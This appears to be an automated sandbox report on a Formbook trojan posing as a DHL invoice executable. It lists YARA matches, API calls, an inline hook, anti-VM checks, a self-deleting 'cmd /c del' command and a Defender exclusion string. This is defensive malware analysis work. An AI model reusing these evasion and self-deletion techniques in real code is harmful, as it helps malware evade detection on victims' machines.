          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: String function: 0146B150 appears 45 times
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: String function: 0490B150 appears 35 times
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A360 NtCreateFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A410 NtReadFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A490 NtClose
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A540 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A40A NtReadFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_0041A53C NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A99A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A98F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A95D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A97A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A96E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014AB040 NtSuspendThread
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014AA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9A10 NtQuerySection
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9560 NtWriteFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014AAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9760 NtOpenProcess
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014AA770 NtOpenThread
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014AA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe, Code function: 3_2_014A96D0 NtCreateKey
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049499A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049495D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049496D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049496E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049498A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049498F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0494B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049499D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049495F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0494AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949560 NtWriteFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949A80 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949A10 NtQuerySection
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949A20 NtResumeThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0494A3B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_049497A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0494A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949B00 NtSetValueKey
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0494A770 NtOpenThread
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04949760 NtOpenProcess
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A360 NtCreateFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A410 NtReadFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A490 NtClose
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A540 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A40A NtReadFile
          Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_0071A53C NtAllocateVirtualMemory
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilename vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.366898086.0000000005B80000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000000.348349236.00000000004E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000000.358229484.0000000000992000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437873001.00000000016EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361549231.0000000001116000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeBinary or memory string: OriginalFilenameCMSFILEWRITABLETY.exe4 vs invoice dhl.delivery document and original invoice sign.exe
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: invoice dhl.delivery document and original invoice sign.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice dhl.delivery document and original invoice sign.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@2/1
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .SlnpI3O)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmpBinary or memory string: .Slnp
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: invoice dhl.delivery document and original invoice sign.exe, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.invoice dhl.delivery document and original invoice sign.exe.4e0000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.2.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.9.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.0.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.990000.1.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.7.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.3.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.990000.5.unpack, u0006u2000.cs.Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E2855 push ds; ret 0_2_004E32A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 0_2_004E322B push ds; ret 0_2_004E32A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041685A push C1F93286h; ret 3_2_0041685F
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D56C push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D502 push eax; ret 3_2_0041D508
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041D50B push eax; ret 3_2_0041D572
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0041660F push ss; retf 3_2_00416624
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040B75A push esp; retf 3_2_0040B75C
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00992855 push ds; ret 3_2_009932A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0099322B push ds; ret 3_2_009932A7
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014BD0D1 push ecx; ret 3_2_014BD0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0495D0D1 push ecx; ret 11_2_0495D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071685A push C1F93286h; ret 11_2_0071685F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D4B5 push eax; ret 11_2_0071D508
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D56C push eax; ret 11_2_0071D572
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D502 push eax; ret 11_2_0071D508
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071D50B push eax; ret 11_2_0071D572
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0071660F push ss; retf 11_2_00716624
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0070B75A push esp; retf 11_2_0070B75C
          Source: initial sampleStatic PE information: section name: .text entropy: 7.80084963355
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeFile created: \invoice dhl.delivery document and original invoice sign.exe

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE1
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: invoice dhl.delivery document and original invoice sign.exe PID: 3452, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709904 second address: 000000000070990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000709B7E second address: 0000000000709B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 3576Thread sleep time: -40062s >= -30000s
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe TID: 5916Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6932Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_00409AB0 rdtsc 3_2_00409AB0
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread delayed: delay time: 40062
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.403668866.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.388071286.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: invoice dhl.delivery document and original invoice sign.exe, 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.390916923.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
